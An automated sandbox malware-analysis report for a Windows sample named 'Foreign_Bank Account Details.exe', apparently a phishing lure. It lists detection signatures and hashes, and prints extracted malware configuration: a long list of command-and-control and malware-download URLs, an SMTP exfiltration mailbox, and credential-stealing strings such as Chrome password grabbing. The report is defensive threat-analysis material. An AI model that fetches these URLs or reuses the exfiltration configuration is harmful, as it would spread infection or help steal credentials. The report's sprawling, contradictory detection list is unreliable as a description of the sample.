Windows Analysis Report Foreign_Bank Account Details.exe

Overview

General Information

Sample Name: Foreign_Bank Account Details.exe
Analysis ID: 1613
MD5: 8906fa5fed7b1d3d2e5579d97419c076
SHA1: f4488a79fcb657eb1f3f23c6ce181ae7176fb11c
SHA256: d1a3f5513cfaf506e96e6304d259fb03f5dc23542301fc9c7335a6e921ad65f9
Infos:

Most interesting Screenshot:

Detection

RemCom RemoteAdmin Mimikatz HawkEye Imminent Nanocore Remcos GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected PasteDownloader
Detected Hacktool Mimikatz
Yara detected BlackMoon Ransomware
Yara detected Snake Keylogger
Yara detected Ragnarok ransomware
Yara detected Globeimposter Ransomware
Yara detected Evrial Stealer
Yara detected Avaddon Ransomware
Yara detected GhostRat
Yara detected Mini RAT
Yara detected BLACKMatter Ransomware
Yara detected Koadic
Yara detected Jigsaw
Antivirus detection for URL or domain
Yara detected AESCRYPT Ransomware
Yara detected Rapid ransomware
Yara detected RansomwareGeneric
Yara detected Ouroboros ransomware
Yara detected Fiesta Ransomware
Yara detected Lolkek Ransomware
Yara detected LimeRAT
Yara detected GuLoader
Yara detected Chaos Ransomware
Yara detected Hancitor
Yara detected TeslaCrypt Ransomware
Found malware configuration
Yara detected Mock Ransomware
Yara detected Conti ransomware
Yara detected Generic Dropper
Yara detected NoCry Ransomware
Yara detected ByteLocker Ransomware
Yara detected RegretLocker Ransomware
Yara detected Crypt ransomware
Yara detected Meterpreter
Yara detected Clop Ransomware
Yara detected Xmrig cryptocurrency miner
Yara detected ISRStealer
Yara detected LockBit ransomware
Yara detected LOCKFILE ransomware
Yara detected Cerber ransomware
Yara detected Rhino ransomware
Yara detected Niros Ransomware
Yara detected Buran Ransomware
Yara detected VHD ransomware
Yara detected generic Shellcode Injector
Yara detected Netwalker ransomware
Yara detected Vidar stealer
Yara detected Jcrypt Ransomware
Yara detected Delta Ransomware
Yara detected Predator
Yara detected Mimikatz
Detected HawkEye Rat
Detected Remcos RAT
Sigma detected: RegAsm connects to smtp port
Yara detected RevengeRAT
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Yara detected LaZagne password dumper
Yara detected Metasploit Payload
Yara detected LazParking Ransomware
Yara detected Discord Token Stealer
Yara detected MailPassView
Yara detected Parallax RAT
Yara detected GlobeLocker Ransomware
Yara detected Zeppelin Ransomware
Yara detected Apis Ransomware
Yara detected Wannacry ransomware
Yara detected AgentTesla
Yara detected MegaCortex Ransomware
Yara detected Valak
Yara detected AntiVM3
Yara detected Cobra Locker ransomware
Yara detected RekenSom ransomware
Detected Nanocore Rat
Yara detected Babuk Ransomware
Yara detected Nemty Ransomware
Yara detected NetWire RAT
Yara detected Linux EvilGnome RC5 key
Yara detected Clay Ransomware
Yara detected Thanos ransomware
Yara detected CryLock ransomware
Yara detected Pony
Yara detected OCT Ransomware
Yara detected Snatch Ransomware
Yara detected VBKeyloggerGeneric
Yara detected Silvertor Ransomware
Yara detected Coinhive miner
GuLoader behavior detected
Yara detected Annabelle Ransomware
Yara detected Gocoder ransomware
Detected Imminent RAT
Yara detected BitCoin Miner
Yara detected WannaRen ransomware
Multi AV Scanner detection for submitted file
Yara detected Ryuk ransomware
Yara detected Zeoticus ransomware
Yara detected Porn Ransomware
Yara detected DarkSide Ransomware
Malicious sample detected (through community Yara rule)
Yara detected HiddenTear ransomware
Yara detected Telegram RAT
Yara detected WormLocker Ransomware
Yara detected Mailto ransomware
Yara detected Voidcrypt Ransomware
Yara detected Njrat
Yara detected GoGoogle ransomware
Yara detected Axiom Ransomware
Yara detected Artemon Ransomware
Yara detected Betabot
Yara detected Covid19 Ransomware
Yara detected UACMe UAC Bypass tool
Yara detected AveMaria stealer
Yara detected Nukesped
Yara detected LokiLocker Ransomware
Yara detected Cryptolocker ransomware
Yara detected Marvel Ransomware
Multi AV Scanner detection for domain / URL
Yara detected Codoso Ghost
Yara detected Cute Ransomware
Yara detected 0x0M4R Ransomware
Yara detected Growtopia
Yara detected Windows Security Disabler
Yara detected Amnesia ransomware
Yara detected Dorkbot
Contains VNC / remote desktop functionality (version string found)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
May modify the system service descriptor table (often done to hook functions)
Yara detected AllatoriJARObfuscator
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Found potential ransomware demand text
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Hides threads from debuggers
Writes to foreign memory regions
Yara detected MSILLoadEncryptedAssembly
Binary or sample is protected by dotNetProtector
C2 URLs / IPs found in malware configuration
May enable test signing (to load unsigned drivers)
Deletes shadow drive data (may be related to ransomware)
Found strings related to Crypto-Mining
Tries to detect Any.run
Found Tor onion address
Sample is not signed and drops a device driver
Tries to harvest and steal browser information (history, passwords, etc)
Found string related to ransomware
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Yara detected VB6 Downloader Generic
Contains functionality to hide user accounts
Modifies the hosts file
May drop file containing decryption instructions (likely related to ransomware)
Yara detected Autohotkey Downloader Generic
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Creates driver files
Checks if the current process is being debugged
May initialize a security null descriptor
Queries the volume information (name, serial number etc) of a device
Deletes files inside the Windows folder
Contains functionality to query the security center for anti-virus and firewall products
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Yara detected RemCom RemoteAdmin tool
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Contains strings related to BOT control commands
Detected TCP or UDP traffic on non-standard ports
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Winexe tool
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Binary contains a suspicious time stamp
Yara detected Keylogger Generic
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
May infect USB drives
PE file contains sections with non-standard names
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Yara detected Credential Stealer
PE file contains executable resources (Code or Archives)
AV process strings found (often used to terminate AV products)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Uses SMTP (mail sending)
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc Avira URL Cloud: Label: malware
Source: http://costacars.es/ico/ortodox.php Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp Malware Configuration Extractor: Metasploit {"Type": "Execute Command", "Command": "\u0001"}
Source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack Malware Configuration Extractor: Pony {"C2 list": ["http://www.trotux.com/?z=", "http://www.zhongsou.com/kefu/zskf.htm", "http://www.w3.org/1999/xsl/transform", "http://evanstechnology.com", "http://41.59.0.100/intranet", "http://www.microsoft.com", "http://www.direct-ip.com/", "http://downloadfilesldr.com/index5.php?adv=141", "http://spywaresoftstop.com/download/141/setup.exe", "http://service.srvmd6.com/Mac/getInstallerSettings/?version=", "http://gveejlsffxmfjlswjmfm.com/files/", "http://so1.5k5.net/interface?action=install&p=", "http://thespecsupportservice.com/uno.dat", "http://110.42.4.180:", "http://pznjaslo.pl/wp-content/outstanding-invoices/", "http://aindonashi.blogspot.com/", "http://www.alibaba.com", "http://(www|corail)\\\\.sudoc", "http://downloadfilesldr.com/index2.php?adv=141", "http://santasalete.sp.gov.br/jss/", "http://acayipbiri.blogspot.com/", "http://bardubar.com/mMS83JIdhq/ieygBSH38hsJa/", "http://xn--", "http://a.pomf.cat/", "http://cicahroti.blogspot.com/ ", "http://22y456.com/", "http://my-speak.eu/csioj.exe", "http://babukq4e2p4wu4iq.onion", "http://62.210.214.", "http://articlunik.blogspot.com/", "http://spotdewasa.blogspot.com/", "http://basti.ciseducation.org/website/images/prettyphoto/dark_square/.x1-unix/", "http://www.nytimes.com", "http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=", "http://d1.downxia.net/products/", "http://www.gamedanji.cn/ExeIni", "http://aitimatafb.blogspot.com/", "http://berkah2013.blogspot.com/", "http://bigboobsp.blogspot.com/ ", "http://aspeja.org/question/", "http://www.apple.com", "http://www.chipsroofingloveland.com/status/services-06-26-18-new-customer-vh/", "http://microhelptech.com/gotoassist/", "http://pastebin.com/", "http://www.fastclick.com", "http://errors.statsmyapp.com", "http://gicia.info/cd/cd.php?id=%s&ver=g", "http://musah.info/", "http://%s/buy_online.php", "http://apee296.co.ke/tatiyv6824540/gescanntes-dokument/zahlungserinnerung", "http://www.tripod.com", "http://batrasiaku.blogspot.com/", "http://gaigoixxx.blogspot.com/ ", "http://www.sqwire.com", "http://arthisoft.blogspot.com/ ", "http://www.steelbendersrfq.cf/", "http://gg", "http://www.", "http://yamaofficial.com/rxuczm/3415201.png", "http://www.xanga.com", "http://www.cnn.com", "http://xn---82-qdd0akcfirgv4j.xn--p1ai/ups-ship-notification/mar-13-18-07-06-38/", "http://wmwifbajxxbcxmucxmlc.com/files/", "http://81.177.26.20/ayayay", "http://i.compucrush.com/i.php", "http://jugnitv.com/final.jpg", "http://www.consumerinput.com/", "http://104.236.94.", "http://cl.1ck.me/", "http://seuufhehfueughek.ws/", "http://bonkersmen.blogspot.com/", "http://www.j.mp/", "http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe", "http://www.mlb.com", "http://www.friskypotato.com/", "http://tumicy.com/plqijcndwoisdhsaow/", "http://pages", "http://www.yahoo.com", "http://whatami.us.to/tc", "http://darkside", "http://www.monster.com", "http://www.netscape.com", "http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php", "http
Source: RegAsm.exe.5916.8.memstrmin Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "purchasing@cselegance.comCSE.868mail.cselegance.com"}
Source: MpSigStub.exe.3992.35.memstrmin Malware Configuration Extractor: CryLock {"Extensions": "dpost cal ed, module handle c:\\temp\\co kies.log WantRele !Trickbot.AAA!sms !Trickbotpw.A!mod Grab_Passwords_Chrome(0) Grab_Passwords_Chrome() success Grab_Passwords_Chrome(): Can't open database \\Google\\Chrome\\User Data\\Default\\Login Data.bak [Reflection.Assembly]::LoadFile(\"$binpath\\KeePass.exe\") Write-warning \"Unable Load KeePass Binarys\" Internet Explorer Internet Explorer] !Trickbotem.A!mod Grabbed %s from Inbox Grabbed %s from Contacts Error hiding Outlook from the taskbar Hide Outlook from system tray StartOutlook(): before hide c:\\temp\\mail.log StartOutlook(): ShellExecuteW() %S %S StartOutlook(): ShellExecuteW() %S %S] !TrickBot.I!MTB !TrickBot.J!MTB XYXEQX8dMYWKgX8KMNQpqCL \tgMofH.dll !Control !ControlFreeBufferReleaseStart !TrickBot.K!MTB Xvaultcli.dll SysListView32 atl.dll SRVDATA.dll NetServerStart NetServerStop JSRVDATA.dllControlFreeBufferNetServerStartNetServerStopReleaseStart !Trickbot.V!ibt +VC20XC00U Trojan:Win64/TrickInj.A!MTB inj_64.dll [INIT] Inj = %u [INIT] BC = %u [INIT] Proxy = %u #pgid# #pgid#] !TrickBot.A!ibt \\rdpscan.pdb Control ControlFreeBufferReleaseStart] TrojanDownloader:O97M/Emotet.QAZ!MTB $TrojanDownloader:O97M/Emotet.QAZ!MTB TrojanDownloader:O97M/Emotet.RAA!MTB $TrojanDownloader:O97M/Emotet.RAA!MTB TrojanDownloader:O97M/Emotet.RAB!MTB $TrojanDownloader:O97M/Emotet.RAB!MTB !Trickbotspr.A!mod CmainSpreader::init() CreateThread, error code %i CmainSpreader::init() CreateEvent, error code %i WormShare lsass.exe End of Romance spreader with module handle 0x%08X is started spreader with module handle 0x%08X is started] !TrickInj.B!MTB inj_32.dll #gid# /QConnection !EmotetCrypt.MR!MTB Trojan:Win64/Trickbot.SS!MTB dllor.dll bEjvvgF7zLSVe7I SKe1E7e1BJnWQG 0qjqOSdonoe2dLUW !ControlFreeBufferReleaseStart] TrojanDownloader:O97M/IcedID.YJ!MTB #TrojanDownloader:O97M/IcedID.YJ!MTB !Trickbot.PN!MSR rdpscan.dll rdpscan.pdb rdpscan.pdb] Behavior:Win32/Trickbot.A!sms !Trickbot.A!sms !Trickbot.B!ibt \\webinject32.pdb \\webinject62.pdb ControlFreeBufferReleaseStart WebInject build %s %s (%s) starting STATIC FAKE rebuild= Injection failure process pid = CheckAndInjectExplorer(): CreateToolhelp32Snapshot(): Chrome is zombie Starting and injecting chrome [INJECT] inject_via_remotethread_wow64 [INJECT] inject_via_remotethread_wow64] !Trickbot.N grab_passwords_chrome() )from logins where blacklisted_by_user = 0 \\default\\login data.bak mimikatz] !Trickbot.O [reflection.assembly]::loadfile(\" \\keepass.exe\") MTIzNA==; cXdlcg==; MTIzNA==; cXdlcg==;] !TrickbotVP.A!MTB vpnDll build %s %s started VPN bridge failure 11:43 vpnDll.dll WantRelease RasGetConnectStatusA] !Azurlt!MTB U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cVW5pbnN0YWxs SetEnvironmentVariableW CreateProcessAsUserW GlobalMemoryStatus SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA== GDIScreenShot CryptReleaseContext CryptUnprotectData PVAULT_CRED8 Process32NextW uFileFinderU uIE7_decodeU ShellExecuteExW GetL
Yara detected Predator
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected RevengeRAT
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Pony
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Multi AV Scanner detection for submitted file
Source: Foreign_Bank Account Details.exe ReversingLabs: Detection: 33%
Yara detected Njrat
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Multi AV Scanner detection for domain / URL
Source: http://www.bonusesfound.ml/update/index.php Virustotal: Detection: 13% Perma Link
Source: http://110.42.4.180: Virustotal: Detection: 13% Perma Link
Antivirus or Machine Learning detection for unpacked file
Source: 35.3.MpSigStub.exe.15b1aab7177.152.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.15b1aab4af5.151.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.15b1bc6cad6.47.unpack Avira: Label: TR/Patched.Ren.Gen2
Source: 35.3.MpSigStub.exe.15b1a70f33e.138.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Location Tracking:

barindex
Yara detected Hancitor
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1D26ED10 CryptUnprotectData, 8_2_1D26ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 8_2_1D26F3A1 CryptUnprotectData, 8_2_1D26F3A1
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4C1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary, 42_2_00007FF650D4C1C4
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits:

barindex
Yara detected UACMe UAC Bypass tool
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b887722.80.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18291855169.0000015B1B8B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR

Privilege Escalation:

barindex
Detected Hacktool Mimikatz
Source: MpSigStub.exe, 00000023.00000003.18325905490.0000015B1AC98000.00000004.00000001.sdmp String found in binary or memory: blog.gentilkiwi.com/mimikatz

Bitcoin Miner:

barindex
Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb541e6.101.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b78484d.88.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a7b2b8a.201.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c2da78e.186.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb549ea.103.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bca02c1.48.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c2d858a.187.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a7b1586.200.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b785121.89.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc8ebc5.50.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c22da.163.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc91019.49.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.70.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb551ee.102.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b785a75.90.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c2da78e.83.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.71.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c2d858a.84.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.72.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c22da.69.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a70f33e.138.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bbe6ede.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c7264.164.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bb8fa9d.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c6d17.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1beda3cf.131.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18324883471.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18297885321.0000015B1B490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18323536692.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18299055991.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18347582446.0000015B1B490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18341085023.0000015B1C4A2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18283369164.0000015B1BBD8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18299634028.0000015B1AF1A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18325191461.0000015B1BE9F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18328153087.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18348306594.0000015B1B176000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18332249196.0000015B1A914000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18306567757.0000015B1C2D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18287592963.0000015B1BBD8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18305659214.0000015B1C39B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18310362275.0000015B1B490000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Coinhive miner
Source: Yara match File source: 35.3.MpSigStub.exe.15b1aba7f01.191.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b53329f.120.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b41327e.91.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a4a33ed.106.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bde4c13.118.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c2da78e.186.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1aac7d52.155.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1aab7177.152.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1ac33b5a.193.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1c2d858a.187.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1aac714e.153.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1ac33b5a.146.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1ac33b5a.206.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a6c67ca.70.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b41327e.91.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1abe8b36.144.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1aab4af5.151.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1aba58ad.190.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1a4a0d99.105.raw.unpack, type: UNPACKEDPE
